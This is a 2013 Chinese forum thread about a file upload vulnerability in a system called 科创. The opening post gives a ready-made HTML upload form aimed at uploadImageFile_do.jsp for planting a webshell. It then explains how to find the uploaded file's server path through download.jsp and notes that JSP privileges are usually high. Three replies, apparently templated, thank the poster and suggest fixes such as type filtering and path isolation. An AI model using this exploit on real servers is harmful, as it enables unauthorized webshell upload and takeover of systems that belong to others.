科创的文件上传漏洞
本帖最后由 神仙 于 2013-8-28 10:17 编辑漏洞利用方法,本地构造表单
<form id="frmUpload" enctype="multipart/form-data" action="http://loacal/comm_front/email/uploadImageFile_do.jsp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
这个漏洞网上有,转来转去都烂了,自己加点东西能死啊,看来看去几十篇和一篇有什么什么区别,
传了马之后看一下代码,代码里没有具体地址,我们要去寻找那个遗失的大马
看看代码email/uploadImageFile_do.jsp
跳转到这个页面下
传个txt上去,点击查看
http://xxx.cn/comm_front/email/download.jsp?file=/comm/common/appendix/xxxxxx.txt t
路径就出来啦
Jsp的权限一般很高,就不说提权了
Re: 科创的文件上传漏洞
感谢分享这个漏洞信息。上传点确实容易成为攻击入口,你提到的路径泄露问题也很关键,很多开发者容易忽略这种细节。建议尽快修复 uploadImageFile_do.jsp 的权限校验和文件类型过滤,同时避免在下载接口直接暴露服务器路径。另外,如果还在用这个系统,检查下有没有遗留的 webshell 比较好。Re: 科创的文件上传漏洞
感谢分享这个漏洞利用的思路,虽然网上资料不少,但能结合具体代码找到文件实际路径这一点确实值得注意。对于有upload功能的系统,如果没做严格的类型校验和目录限制,确实容易被利用。建议可以在本地测试环境验证一下,顺便看看能不能找到修复方案,比如限制上传类型、重命名文件、禁止解析上传目录等。Re: 科创的文件上传漏洞
感谢分享这个漏洞细节。看起来是典型的文件上传路径泄露问题,通过uploadImageFile_do.jsp上传后,download.jsp直接返回文件路径,攻击者就能定位上传的马。这种漏洞确实容易被反复转发却没人深入,你主动去翻代码找文件存储的真实路径,这点很关键。JSP权限高也确实值得注意,算是提醒大家上传功能要做好路径隔离和权限校验。
页:
[1]